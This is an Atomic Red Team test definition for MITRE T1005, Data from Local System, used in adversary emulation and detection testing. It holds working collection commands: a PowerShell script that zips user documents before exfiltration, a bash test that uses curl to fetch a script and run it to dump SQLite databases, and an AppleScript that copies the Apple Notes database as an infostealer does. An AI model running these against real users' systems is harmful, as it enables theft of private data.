Atomic Red Team doc generator
108 lines
4.8 KiB
YAML
108 lines
4.8 KiB
YAML
attack_technique: T1005
|
|
display_name: Data from Local System
|
|
atomic_tests:
|
|
- name: Search files of interest and save them to a single zip file (Windows)
|
|
auto_generated_guid: d3d9af44-b8ad-4375-8b0a-4bff4b7e419c
|
|
description: |
|
|
This test searches for files of certain extensions and saves them to a single zip file prior to extraction.
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
starting_directory:
|
|
description: Path to starting directory for the search
|
|
type: Path
|
|
default: C:\Users
|
|
output_zip_folder_path:
|
|
description: Path to directory for saving the generated zip file
|
|
type: Path
|
|
default: PathToAtomicsFolder\..\ExternalPayloads\T1005
|
|
file_extensions:
|
|
description: List of file extensions to be searched and zipped, separated by comma and space
|
|
type: string
|
|
default: .doc, .docx, .txt
|
|
executor:
|
|
command: |
|
|
$startingDirectory = "#{starting_directory}"
|
|
$outputZip = "#{output_zip_folder_path}"
|
|
$fileExtensionsString = "#{file_extensions}"
|
|
$fileExtensions = $fileExtensionsString -split ", "
|
|
|
|
New-Item -Type Directory $outputZip -ErrorAction Ignore -Force | Out-Null
|
|
|
|
Function Search-Files {
|
|
param (
|
|
[string]$directory
|
|
)
|
|
$files = Get-ChildItem -Path $directory -File -Recurse | Where-Object {
|
|
$fileExtensions -contains $_.Extension.ToLower()
|
|
}
|
|
return $files
|
|
}
|
|
|
|
$foundFiles = Search-Files -directory $startingDirectory
|
|
if ($foundFiles.Count -gt 0) {
|
|
$foundFilePaths = $foundFiles.FullName
|
|
Compress-Archive -Path $foundFilePaths -DestinationPath "$outputZip\data.zip"
|
|
|
|
Write-Host "Zip file created: $outputZip\data.zip"
|
|
} else {
|
|
Write-Host "No files found with the specified extensions."
|
|
}
|
|
cleanup_command: |
|
|
Remove-Item -Path $outputZip\data.zip -Force
|
|
|
|
name: powershell
|
|
elevation_required: false
|
|
- name: Find and dump sqlite databases (Linux)
|
|
auto_generated_guid: 00cbb875-7ae4-4cf1-b638-e543fd825300
|
|
description: |
|
|
An adversary may know/assume that the user of a system uses sqlite databases which contain interest and sensitive data. In this test we download two databases and a sqlite dump script, then run a find command to find & dump the database content.
|
|
supported_platforms:
|
|
- linux
|
|
input_arguments:
|
|
remote_url:
|
|
description: url of remote payload
|
|
type: url
|
|
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1005/src
|
|
dependencies:
|
|
- description: |
|
|
Check if running on a Debian based machine.
|
|
prereq_command: |
|
|
if [ -x "$(command -v sqlite3)" ]; then echo "sqlite3 is installed"; else echo "sqlite3 is NOT installed"; exit 1; fi
|
|
if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
|
|
if [ -x "$(command -v strings)" ]; then echo "strings is installed"; else echo "strings is NOT installed"; exit 1; fi
|
|
get_prereq_command: |
|
|
if grep -iq "debian\|ubuntu\|kali\|mint" /usr/lib/os-release; then apt update && apt install -y binutils curl sqlite3; fi
|
|
if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then yum update -y && yum install -y binutils curl sqlite-devel; fi
|
|
executor:
|
|
name: bash
|
|
elevation_required: false
|
|
command: |
|
|
cd $HOME
|
|
curl -O #{remote_url}/art
|
|
curl -O #{remote_url}/gta.db
|
|
curl -O #{remote_url}/sqlite_dump.sh
|
|
chmod +x sqlite_dump.sh
|
|
find . ! -executable -exec bash -c 'if [[ "$(head -c 15 {} | strings)" == "SQLite format 3" ]]; then echo "{}"; ./sqlite_dump.sh {}; fi' \;
|
|
cleanup_command: |
|
|
rm -f $HOME/.art
|
|
rm -f $HOME/gta.db
|
|
rm -f $HOME/sqlite_dump.sh
|
|
|
|
- name: Copy Apple Notes database files using AppleScript
|
|
auto_generated_guid: cfb6d400-a269-4c06-a347-6d88d584d5f7
|
|
description: |
|
|
This command will copy Apple Notes database files using AppleScript as seen in Atomic Stealer.
|
|
supported_platforms:
|
|
- macos
|
|
input_arguments:
|
|
destination_path:
|
|
description: Specify the path to copy the database files into.
|
|
type: path
|
|
default: /private/tmp
|
|
executor:
|
|
command: |-
|
|
osascript -e 'tell application "Finder"' -e 'set destinationFolderPath to POSIX file "#{destination_path}"' -e 'set notesFolderPath to (path to home folder as text) & "Library:Group Containers:group.com.apple.notes:"' -e 'set notesFolder to folder notesFolderPath' -e 'set notesFiles to {file "NoteStore.sqlite", file "NoteStore.sqlite-shm", file "NoteStore.sqlite-wal"} of notesFolder' -e 'repeat with aFile in notesFiles' -e 'duplicate aFile to folder destinationFolderPath with replacing' -e 'end' -e 'end tell'
|
|
cleanup_command: 'rm "#{destination_path}/NoteStore.sqlite*"'
|
|
name: sh
|
|
elevation_required: false |